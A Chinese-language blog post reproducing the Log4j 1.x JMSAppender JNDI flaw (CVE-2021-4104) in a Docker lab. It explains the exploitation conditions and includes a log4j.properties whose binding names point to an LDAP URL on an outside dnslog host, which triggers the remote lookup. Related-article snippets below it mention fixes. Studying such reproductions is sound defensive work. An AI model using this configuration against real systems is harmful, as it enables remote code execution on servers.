Apache Log4j 1.x JMSAppender配置代码执行漏洞(CVE-2021-4104)

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/128276499
版权

Apache Log4j 1.x JMSAppender配置代码执行漏洞(CVE-2021-4104)

0x01 漏洞简介

在 1.x 版的 Java 日志库 Apache Log4j 中发现了一个缺陷。Log4j 1.x 中的 JMSAppender 容易受到不受信任数据的反序列化。如果部署的应用程序配置为使用 JMSAppender 和攻击者的 JNDI LDAP 端点,这允许远程攻击者在服务器上执行代码。发现存在 JNDI 远程命令执行漏洞,效果与 log4j2 漏洞类似,但利用条件相对苛刻。

0x02 影响版本

Apache Log4j =1.2.x

0x03 环境搭建

下载搭建环境:docker run -d -P vulfocus/log4j2-cve-2021-4104

0x04 漏洞分析

当攻击者具有对Log4j配置的写访问权限时,Log4j 1.2中的JMSAppender容易受到不受信任数据反序列化的攻击。攻击者可以提供TopicBindingName和TopicConnectionFactoryBindingName配置,导致JMSApender执行JNDI请求,从而以与CVE-2021-44228类似的方式执行远程代码。

  1. 要有 jms 的环境支持

  2. 需要能有写如 log4j.properties 文件内容的权限

漏洞利用条件分析

配置文件写权限:攻击者需通过其他漏洞达成

修改配置:攻击者需通过其他漏洞达成

触发方式:本地(其他漏洞) + 远程(JNDI)

配置方式:不是默认

特殊利用条件:需要外网交互

综合评价

利用难度:高

威胁等级:中等,能造成远程代码执行

//src/main/java/Test.java
import org.apache.log4j.Logger;

public class Test {
    private static Logger logger = Logger.getLogger(Test.class);

    public static void main(String[] args) {
        logger.error("This is debug message.");
    }

}

#src/main/resources/log4j.properties
log4j.rootLogger = error,jms

log4j.appender.jms=org.apache.log4j.net.JMSAppender
log4j.appender.jms.InitialContextFactoryName=org.apache.activemq.jndi.ActiveMQInitialContextFactory
log4j.appender.jms.ProviderURL=tcp://localhost:61616
log4j.appender.jms.TopicBindingName=ldap://pes4dp.dnslog.cn
log4j.appender.jms.TopicConnectionFactoryBindingName=ldap://pes4dp.dnslog.cn #

#pom.xml
<dependencies>
  <dependency>
    <groupId>junit</groupId>
    <artifactId>junit</artifactId>
    <version>4.11</version>
    <scope>test</scope>
  </dependency>
  <dependency>
    <groupId>log4j</groupId>
    <artifactId>log4j</artifactId>
    <version>1.2.17</version>
  </dependency>
  <dependency>
    <groupId>javax.jms</groupId>
    <artifactId>javax.jms-api</artifactId>
    <version>2.0.1</version>
  </dependency>
  <dependency>
    <groupId>org.apache.activemq</groupId>
    <artifactId>activemq-all</artifactId>
    <version>5.15.8</version>
  </dependency>
</dependencies>

在这里插入图片描述

通过对漏洞的调试,发现在 JMSAppender 中调用了 lookup 方法,这是因为我们在 log4j.properties 中写入了 log4j.appender.jms=org.apache.log4j.net.JMSAppender,即去调用 JMSAppender.java 中的 activateOptions 方法。然后在 ctx.lookup (name) 中传入我们指定的恶 意 LDAP 服务地址,从而触发了远程代码执行漏洞。所以从中我们可以看出要必须支持 jms 代理的类才可以执行 rce,本例中就是 activemq 存在 jms 代理的类,所以才执行了该漏洞, 否则将不存在问题。也就是说该漏洞不会出现太大的影响,因为首先需要修改 log4j 的配置, 除非我们利用了其他一些漏洞进行写入,否则将很难利用该点进行 RCE。

在这里插入图片描述

吉吉_大王
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache开源日志框架Log4j配置指南(1.x)
LaoJiuJun的博客
08-05 374
Log4jApache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最方便的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。 本篇指南主要介绍Log...
Log4j漏洞CVE-2021-45046、CVE-2021-45105、CVE-2021-4104修复
weixin_44455388的博客
12-22 2042
1、漏洞范围 远程代码执行漏洞CVE-2021-45046:log4j 2.0-2.15.0版本 拒绝服务漏洞CVE-2021-45105:log4j 2.0-2.16.0版本 远程代码执行漏洞CVE-2021-4104:log4 1.x版本 2、漏洞解决: 针对CVE-2021-45046和CVE-2021-45105,需要升级到2.17.0版本进行修复。 针对CVE-2021-4104需要从类路径中移除JMSAppender类,可利用如下命令进行删除:zip -q -d log4j-*.jar or
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4064
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 911
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码
Log4j(CVE-2021-44228)核弹级漏洞应急响应之旅
jimmyleeee的专栏
12-15 3227
可能大家都知道了Log4j的远程代码执行漏洞CVE-2021-44228),又造成了很多安全运维和开发团队的不眠之夜。下面是参加此次应急响应的过程,简单写下来,以供将来改善。 收到此漏洞之后,公司的团队做了以下紧急安排: 首先,联系Blue Team,根据攻击特征制定相应的防火墙规则,先挡一阵子。事实证明也只能挡一阵子,很快各种绕过就出来了,例如:https://github.com/SecuProject/Pentest-Cheat-Sheet/blob/master/Discovery/HTTP
log4j的bug演示与修复
JustMyLive的博客
12-26 3571
文章目录1、描述2、Log4j版本详细信息3、Log4j官网发布的缓解措施3.1、Log4j 1.x缓解措施3.2、Log4j 2.x缓解措施3.3、不可信的缓解措施4、Spring官网发布的log4j2的漏洞缓解措施4.1、Gradle4.2、Maven5、复现Log4j的bug6、缓解Log4j的bug7、数据来源 1、描述 在 Apache Log4j2 版本(最高包括 2.14.1)(不包括安全发布版 2.3.1、2.12.2 和 2.12.3)中,在配置、日志消息和参数中使用的 JNDI 功能部件
Apache Log4j 五连环漏洞修复锦囊秘籍
Miklechun的专栏
01-21 575
1 、以数据之名 简介 微信公众号、知乎和稀土掘金等,主体均为“以数据之名”; 本文主要针对近期Apache Log4j 5连环漏洞,做修复策略实践经验总结。 2 、Log4j 漏洞综述 【安全通告-高危】Apache Log4j 五连环安全漏洞 【综述】近日,监测到Apache Log4j 存在多个任意代码执行及DoS拒绝漏洞CVE-2021-4104Apache Log4j 1.2.x版本在特定配置时存在JMSAppender 反序列化代码执行漏洞CVE-2021-442
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Apache Log4j 是一个广泛使用的 Java 日志框架,它允许应用...总之,Apache Log4j 远程代码执行漏洞是一个重大安全事件,强调了在软件开发和运维过程中对安全性的重视。及时更新和维护软件库是防止此类漏洞影响的关键。
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
04-08
CMS Made Simple (CMSMS) 前台代码执行漏洞 CVE-2021-26120.md
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
vulfocus复现:log4j2-rce-2021-12-09
woai_zhongguo的博客
07-13 4509
log4j2远程rce漏洞复现
团灭!Log4j 1.x 也爆雷了。。。速速弃用!!
Java技术栈,分享最主流的Java技术
12-29 665
点击关注公众号,Java干货及时送达最近炒得沸沸扬扬的 Log4j2 漏洞门事件,大家应该都修复完了吧,还没修复的看栈长分享的 Log4j2 最新漏洞动态:Log4j 2.3.1 发布!又...
log4j把日志发送到jms服务器
永远的黑山
05-17 4499
log4j.properties配置如下:#等级控制等log4j.rootLogger=debug, stdout, R, A1log4j.category.com.sourceware=debug#控制台appenderlog4j.appender.stdout=org.apache.log4j.ConsoleAppenderlog4j.appender.stdout.layout=org.ap
Log4j框架配置文件log4j.properties配置使用详解
liujian8654562的博客
09-22 944
一.Log4j配置文件分类 Log4j支持两种配置文件格式,一种是XML格式的文件,一种是properties(key=value)文件,其中properties格式的配置文件最为常用,其有一个固定的文件名log4j.properties,下面我们介绍使用properties文件做为配置文件的方法: 二.log4j.properties配置文件详解 上一篇文章中曾指出Log4j框架主要的工作内容...
apache log4j漏洞复现
热门推荐
Shanfenglan's blog
12-10 6万+
文章目录1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645)利用条件利用2. CVE-2019-17571利用条件利用3. apache log4j rce利用条件环境搭建利用 1. Apache Log4j Server 反序列化命令执行漏洞CVE-2017-5645) Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 利用条件
Log4j 漏洞自查复现(仅供学习,勿它用)
W929067865的博客
01-05 417
概念不多说直接上操作 第一步:编写注入类 public class BugFinder { public BugFinder() { try { System.out.println("执行漏洞代码"); // 打开计算器 // Process rt = Runtime.getRuntime().exec("calc"); // 打开记事本 Process rt2 = Runtime.getR...
log4j漏洞原理分析&复现&检测&复盘
qq_43665434的博客
08-22 2832
log4j漏洞原理分析&复现&检测&复盘
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。然而,最近发现了一个严重的漏洞,被命名为CVE-2021-44228。这个漏洞允许攻击者通过恶意构造的日志事件来执行任意代码,导致系统被远程攻击者完全控制。 漏洞是由于Log4j2中的PatternLayout布局处理器存在一个特定的模式转换字符(%d、%i、%m、%p等)被恶意利用的问题。攻击者可以将恶意代码嵌入到日志事件中,并通过向受影响的Log4j2实例发送恶意请求触发此漏洞。一旦攻击成功,攻击者可以在受影响的应用程序上执行任意的远程代码。 这个漏洞的危害性非常高,因为日志功能几乎在每个应用程序中都得到广泛使用。攻击者可以通过恶意日志事件执行各种攻击,包括远程命令执行、数据库注入、代码执行等。受影响的应用程序可能会泄露敏感数据、遭受损坏甚至被完全控制。 解决这个漏洞的最佳方法是升级到Log4j2的最新版本。Apache已经发布了修复此漏洞的版本,更具体地说是2.15.0和2.16.0,这些版本不再处理这类模式转换字符。如果无法立即更新,可以考虑在应用程序中禁用PatternLayout布局处理器,或者使用其他日志管理框架替代Log4j2。 此外,还建议及时监测应用程序的日志活动,并对异常的日志事件进行审查。如果遇到可疑的日志事件,应立即采取行动,例如暂停相关服务、排查日志事件来源、加强网络安全防护等。 总之,Apache Log4j2的CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值